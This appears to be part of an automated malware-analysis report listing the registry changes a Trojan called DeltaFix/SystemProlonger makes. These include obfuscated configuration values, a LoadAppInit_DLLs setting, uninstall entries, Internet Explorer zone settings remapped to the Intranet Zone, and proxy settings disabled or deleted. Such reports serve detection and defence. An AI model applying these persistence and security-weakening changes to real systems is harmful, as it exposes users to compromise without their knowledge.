"NP6yu5 xh2uW4Hwysu7Ssr8oWZx2xW2hDd4djxqbX" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 zUPS3jlhabcQDMNIScd6AO3aDxmTq1WIaX6" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 s/N9q2LFHwy5Ge3vWafDDyM0XgIXL/SocfUpBEc2iz" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 xyxzUr xztv8XRDd4dOlw/ 0eLrMM" = "NP6yu5 p/RcQikg012CPtvY0JqomLb"
"NP6yu5 kq14RlhabcdIjFSyg16YzyLsH" = "NP6yu5 yJSqVjbcdefTNR8h0D9emAILDaou1CDRdu71j"
The process putfu.exe:1320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\DeltaFix\DeltaFix.dll,_uninstall /un /uq"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"uuid" = "6517130317843606773"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Mode" = "4026531840"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"InstallDate" = "20131128"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e46c271e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.1" = "YOMhbhA8RGRiWVRJLFptyEJs1Gf4N6BYhfYnDcv2ltQlpHbknGfnwTljzpVZDqbXQO8DMDT RcE6c0p3bSmCCONT1F3InY0H QUVFjqUB9h4RcMU t9rL4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"72758a5d" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"dlpath" = "c:\progra~1\deltafix\deltafix.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"
"f6ad6fa6" = "V/////%%"
"bbf88800" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"65114b36" = "Vl/l////"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\DeltaFix\DeltaFix.dll,_uninstall /un"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2e22d94e" = "///%"
"e46c271e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"DisplayName" = "SystemProlonger"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"State" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"
"2e22d94e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 96 44 42 0D 40 CC 7C 25 20 0C 12 44 58 0E 33"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0c230bcb" = "///%"
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"24c54e38" = "%Program Files%\DeltaFix\DeltaFix.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Install_Dir" = "%Program Files%\DeltaFix"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f0bf0bde" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"Publisher" = "SystemProlonger"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svpath" = "c:\Program Files\DeltaFix\DeltaFix.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"
"414bc593" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"CategoryName" = ""
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a2e3b941" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.0" = "PXvWSXHtfR8 7BUMOQqsl hhLoeuGPx2fdj01Vlkvs2qkLh1IsVqbGscfR9kRc53e0wDGqo1K/UCnpZvlywrmN7717cr569vPR"
"data.1" = "YOMhbhA8RGRiWVRJLFptyEJs1Gf4N6BYhfYnDcv2ltQlpHbknGfnwTljzpVZDqbXQO8DMDT RcE6c0p3bSmCCONT1F3InY0H QUVFjqUB9h4RcMU t9rL4"
"LRTS" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"date" = "1417183200"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"NoRepair" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"usr.1" = "IUvWSecdefABCDWYSU"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"date" = "1417183200"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.0" = "PXvWSXHtfR8 7BUMOQqsl hhLoeuGPx2fdj01Vlkvs2qkLh1IsVqbGscfR9kRc53e0wDGqo1K/UCnpZvlywrmN7717cr569vPR"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "/P////%%"
"bbf88800" = "///%"
"0c230bcb" = "///%"
"414bc593" = "///%"
"27ddcf6f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Version" = "22022115"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"uuid" = "6517130317843606773"
"svi" = "0"
"svn" = "DeltaFix"
"usr.0" = "T1pZV/tvqomjlhabcd"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svx" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"usr.0" = "T1pZV/tvqomjlhabcd"
"usr.1" = "IUvWSecdefABCDWYSU"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svt" = "1417171946"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and that are not assigned to any other zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E C4 99 67 0F 80 B7 83 85 6B 84 5D FB F5 CF B1"
The process rundll32.exe:512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"65114b36" = "Vl/l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"f6ad6fa6" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"fe94ce1e" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"8b9e4cbc" = "V/////%%"
"2d71d5ab" = "V/////%%"
"7367429f" = "///%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0dc3ee96" = "/P////%%"
"e46c271e" = "///%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a0743acc" = "N/////%%"
"c6c5dd44" = "V/////%%"
